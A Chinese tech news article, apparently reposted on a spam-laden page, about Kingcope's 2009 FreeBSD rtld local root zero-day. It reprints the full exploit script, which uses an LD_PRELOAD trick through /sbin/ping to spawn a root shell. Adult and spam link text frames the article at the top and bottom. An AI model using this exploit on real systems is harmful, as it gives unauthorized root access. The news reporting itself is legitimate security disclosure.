成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

FreeBSD爆嚴重安全漏洞 安全專家稱疑是圣誕前的禮物

安全
在圣誕節即將到來的日子,以安全著稱的FreeBSD系統被著名黑客Kingcope爆了一個零日(0day)漏洞。據Kingcope所說,他長期致力于挖掘FreeBSD系統的本地提權漏洞......

在圣誕節即將到來的日子,以安全著稱的FreeBSD系統被著名黑客Kingcope爆了一個零日(0day)漏洞。據Kingcope所說,他長期致力于挖掘FreeBSD系統的本地提權漏洞,終于有幸在近期發現了這個非常低級的本地提權漏洞;這個漏洞存在于FreeBSD的Run-Time Link-Editor(rtld)程序中,普通用戶可以通過該漏洞非常輕易的獲得root權限。該漏洞影響非常廣泛,包括FreeBSD 7.1至8.0的32及64位系統。

在展示該漏洞威力之前,我們科普一下著名黑客kingcope。從2007年6月至今,他一共公開了12個安全漏洞(沒公開的不知道有多少),其中 FreeBSD和Sun Solaris各兩個,微軟四個,Oracle、mysql、NcFTPD和nginx各一個,同時他還編寫了多個漏洞的攻擊代碼,例如 Sun Solaris telnetd及近期的IIS FTPd、Debian OpenSSH等。

接下來我們在最新的FreeBSD 8.0中重現一下該漏洞的攻擊過程,請注意圖中的紅色部分;我們只要執行名為fbsd8localroot.sh的腳本,就可以輕易的獲得root權限。

相關腳本如下:

#!/bin/sh

echo “FreeBSD local r00t zeroday by Kingcope on November 2009″

cat > env.c << _EOF

#include

main() {

extern char **environ;

environ = (char**)malloc(8096);

environ[0] = (char*)malloc(1024);

environ[1] = (char*)malloc(1024);

strcpy(environ[1], “LD_PRELOAD=/tmp/w00t.so.1.0″);

execl(”/sbin/ping”, “ping”, 0);

}

_EOF

gcc env.c -o env > /dev/null 2>&1

#download from baoz.net

cat > program.c << _EOF

#include

#include

#include

#include

void _init() {

extern char **environ;

environ=NULL;

system(”echo ALEX-ALEX;/bin/sh”);

}

_EOF

gcc -o program.o -c program.c -fPIC ; gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles ; cp w00t.so.1.0 /tmp/w00t.so.1.0 ;./env

FreeBSD尚未就該0day漏洞發布安全公告及官方補丁,敬請關注素包子的博客http://baoz.net/freebsd8-localroot-0day/以獲取該漏洞的最新情況。

【編輯推薦】

  1. 補丁未出 各FreeBSD工程師可暫用臨時方法應急(附代碼)
  2. FreeBSD 6.x特權提升漏洞
  3. FreeBSD爆Root權限提升漏洞
  4. FreeBSD安全連接方式SSL
責任編輯:趙寧寧 來源: cnbeta
相關推薦

2010-07-13 21:23:32

軟件安全安全漏洞

2011-08-30 16:11:03

2014-11-04 10:23:14

2010-06-08 21:14:35

2009-09-30 11:10:31

2021-03-27 09:47:02

漏洞安全Cisco Jabbe

2015-08-26 10:14:29

2023-08-14 19:51:43

2023-07-29 11:15:47

2012-12-21 17:11:22

2017-12-19 10:15:14

2024-07-16 14:03:56

2021-06-21 05:19:43

Peloton Bik安全漏洞

2020-07-27 19:23:03

安全漏洞數據

2012-06-08 10:32:33

2012-11-07 13:23:35

2014-04-09 10:27:29

2023-03-09 07:56:08

2014-06-03 09:23:41

2013-10-28 11:13:47

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 国产精品亚洲片在线播放 | 一区二区三区在线免费观看 | 国产乱肥老妇国产一区二 | 波多野结衣在线观看一区二区三区 | 天天色天天射天天干 | 成人精品视频 | 欧美日韩国产一区二区三区 | 四虎影院美女 | 欧美a v在线| 欧美日韩一区二区在线观看 | 亚洲在线中文字幕 | 亚洲高清在线观看 | 北条麻妃一区二区三区在线视频 | 成人h视频 | 欧美伊人 | 国产婷婷色一区二区三区 | 日韩一区在线观看视频 | 青青草网站在线观看 | 日韩精品免费视频 | 97精品超碰一区二区三区 | 日韩av一区二区在线观看 | 精品欧美乱码久久久久久1区2区 | 欧美国产日韩在线观看成人 | 国产精品18久久久 | 日日夜夜天天 | 美女久久视频 | 成人午夜视频在线观看 | 日韩色在线 | 国产一区二区三区视频 | 午夜视频在线免费观看 | 亚洲欧洲精品在线 | 粉嫩一区二区三区四区公司1 | 欧美 日韩 国产 成人 在线 | 欧美激情亚洲天堂 | 日本精品一区二区三区在线观看视频 | 亚洲免费婷婷 | 成人精品一区二区三区中文字幕 | 午夜三级在线观看 | 国产一级片在线播放 | 国产成人影院 | 国产一区二区三区免费 |